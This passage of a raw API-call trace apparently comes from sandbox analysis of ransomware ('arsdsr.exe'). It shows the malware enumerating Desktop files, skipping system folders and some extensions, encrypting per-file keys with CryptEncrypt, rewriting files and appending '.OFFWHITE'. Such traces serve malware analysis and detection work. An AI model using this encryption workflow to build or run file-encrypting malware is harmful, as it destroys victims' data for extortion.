lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.141] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="F YK4 PMxMve7si5 sI.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif" [0132.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.141] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.141] PathFindExtensionW (pszPath="F YK4 PMxMve7si5 sI.gif") returned=".gif" [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0132.141] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0132.142] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0132.142] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0132.142] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0132.142] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0132.142] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0132.142] lstrcmpiW (lpString1="F YK4 PMxMve7si5 sI.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.142] GetProcessHeap () returned 0x500000 [0132.142] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f08 [0132.142] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f yk4 pmxmve7si5 si.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.142] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=84562) returned 1 [0132.142] GetProcessHeap () returned 0x500000 [0132.142] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.142] GetProcessHeap () returned 0x500000 [0132.142] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.142] GetProcessHeap () returned 0x500000 [0132.142] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.142] GetProcessHeap () returned 0x500000 [0132.142] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.142] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.142] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.143] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.143] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.143] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.143] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.143] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.143] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.143] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.143] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.143] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.143] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.143] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14a52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.143] SetLastError (dwErrCode=0x0) [0132.143] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.145] GetLastError () returned 0x0 [0132.145] GetLastError () returned 0x0 [0132.145] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14b52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.145] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.145] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14c52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.145] WriteFile (in: hFile=0xb0, lpBuffer=0x547f08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f08*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.145] GetProcessHeap () returned 0x500000 [0132.145] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14a52) returned 0x5557b0 [0132.145] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.145] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x14a52, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x14a52, lpOverlapped=0x0) returned 1 [0132.151] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.151] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x14a52, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x14a52, lpOverlapped=0x0) returned 1 [0132.151] GetProcessHeap () returned 0x500000 [0132.152] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.152] CloseHandle (hObject=0xb0) returned 1 [0132.155] GetProcessHeap () returned 0x500000 [0132.155] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.155] GetProcessHeap () returned 0x500000 [0132.155] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.155] GetProcessHeap () returned 0x500000 [0132.155] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.155] GetProcessHeap () returned 0x500000 [0132.155] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.155] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif" [0132.155] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif.OFFWHITE" [0132.155] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f yk4 pmxmve7si5 si.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F YK4 PMxMve7si5 sI.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f yk4 pmxmve7si5 si.gif.offwhite")) returned 1 [0132.157] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaeacca0, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0x7c0d63f0, ftLastAccessTime.dwHighDateTime=0x1d5e30d, ftLastWriteTime.dwLowDateTime=0x7c0d63f0, ftLastWriteTime.dwHighDateTime=0x1d5e30d, nFileSizeHigh=0x0, nFileSizeLow=0x83ed, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="GlsYptB0D -eCjT5KGU.swf", cAlternateFileName="GLSYPT~1.SWF")) returned 1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2=".") returned 1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="..") returned 1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="...") returned 1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="windows") returned -1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="$recycle.bin") returned 1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="rsa") returned -1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="ntuser.dat") returned -1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="programdata") returned -1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="appdata") returned 1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="program files") returned -1 [0132.157] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="program files (x86)") returned -1 [0132.157] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.157] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="GlsYptB0D -eCjT5KGU.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf" [0132.158] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.158] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.158] PathFindExtensionW (pszPath="GlsYptB0D -eCjT5KGU.swf") returned=".swf" [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0132.158] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0132.158] lstrcmpiW (lpString1="GlsYptB0D -eCjT5KGU.swf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.158] GetProcessHeap () returned 0x500000 [0132.158] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f18 [0132.158] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\glsyptb0d -ecjt5kgu.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.159] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=33773) returned 1 [0132.159] GetProcessHeap () returned 0x500000 [0132.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.159] GetProcessHeap () returned 0x500000 [0132.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.159] GetProcessHeap () returned 0x500000 [0132.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.159] GetProcessHeap () returned 0x500000 [0132.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.159] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.159] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.159] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.159] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.159] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.159] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.159] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.160] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.160] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.160] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.160] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x83ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.160] SetLastError (dwErrCode=0x0) [0132.160] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.162] GetLastError () returned 0x0 [0132.162] GetLastError () returned 0x0 [0132.162] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x84ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.162] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.162] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x85ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.163] WriteFile (in: hFile=0xb0, lpBuffer=0x547f18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f18*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.163] GetProcessHeap () returned 0x500000 [0132.163] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x83ed) returned 0x5557b0 [0132.163] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.163] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x83ed, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x83ed, lpOverlapped=0x0) returned 1 [0132.166] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.166] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x83ed, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x83ed, lpOverlapped=0x0) returned 1 [0132.166] GetProcessHeap () returned 0x500000 [0132.166] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.166] CloseHandle (hObject=0xb0) returned 1 [0132.168] GetProcessHeap () returned 0x500000 [0132.168] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.168] GetProcessHeap () returned 0x500000 [0132.168] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.168] GetProcessHeap () returned 0x500000 [0132.168] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.168] GetProcessHeap () returned 0x500000 [0132.168] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.168] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf" [0132.168] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf.OFFWHITE" [0132.168] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\glsyptb0d -ecjt5kgu.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GlsYptB0D -eCjT5KGU.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\glsyptb0d -ecjt5kgu.swf.offwhite")) returned 1 [0132.170] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9bf4000, ftCreationTime.dwHighDateTime=0x1d5d996, ftLastAccessTime.dwLowDateTime=0x687798d0, ftLastAccessTime.dwHighDateTime=0x1d5e27f, ftLastWriteTime.dwLowDateTime=0x687798d0, ftLastWriteTime.dwHighDateTime=0x1d5e27f, nFileSizeHigh=0x0, nFileSizeLow=0x93da, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="heCbUGTRHJlmG2dK.mp4", cAlternateFileName="HECBUG~1.MP4")) returned 1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2=".") returned 1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="..") returned 1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="...") returned 1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="windows") returned -1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="$recycle.bin") returned 1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="rsa") returned -1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="ntuser.dat") returned -1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="programdata") returned -1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="appdata") returned 1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="program files") returned -1 [0132.170] lstrcmpiW (lpString1="heCbUGTRHJlmG2dK.mp4", lpString2="program files (x86)") returned -1 [0132.171] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.171] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="heCbUGTRHJlmG2dK.mp4" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heCbUGTRHJlmG2dK.mp4") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heCbUGTRHJlmG2dK.mp4" [0132.171] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.171] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.171] PathFindExtensionW (pszPath="heCbUGTRHJlmG2dK.mp4") returned=".mp4" [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".log") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".cab") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".cmd") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".com") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".cpl") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".url") returned -1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".mp3") returned 1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".pif") returned -1 [0132.172] lstrcmpiW (lpString1=".mp4", lpString2=".mp4") returned 0 [0132.172] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77f7a210, ftCreationTime.dwHighDateTime=0x1d5de82, ftLastAccessTime.dwLowDateTime=0xb122a650, ftLastAccessTime.dwHighDateTime=0x1d5dc9a, ftLastWriteTime.dwLowDateTime=0xb122a650, ftLastWriteTime.dwHighDateTime=0x1d5dc9a, nFileSizeHigh=0x0, nFileSizeLow=0x10d29, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="IWfTOYIvF.gif", cAlternateFileName="IWFTOY~1.GIF")) returned 1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2=".") returned 1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="..") returned 1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="...") returned 1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="windows") returned -1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="$recycle.bin") returned 1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="rsa") returned -1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="ntuser.dat") returned -1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="programdata") returned -1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="appdata") returned 1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="program files") returned -1 [0132.172] lstrcmpiW (lpString1="IWfTOYIvF.gif", lpString2="program files (x86)") returned -1 [0132.172] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.173] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="IWfTOYIvF.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IWfTOYIvF.gif" [0132.173] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.173] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.173] PathFindExtensionW (pszPath="IWfTOYIvF.gif") returned=".gif" [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0132.173] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0132.173] lstrcmpiW (lpString1="IWfTOYIvF.gif", 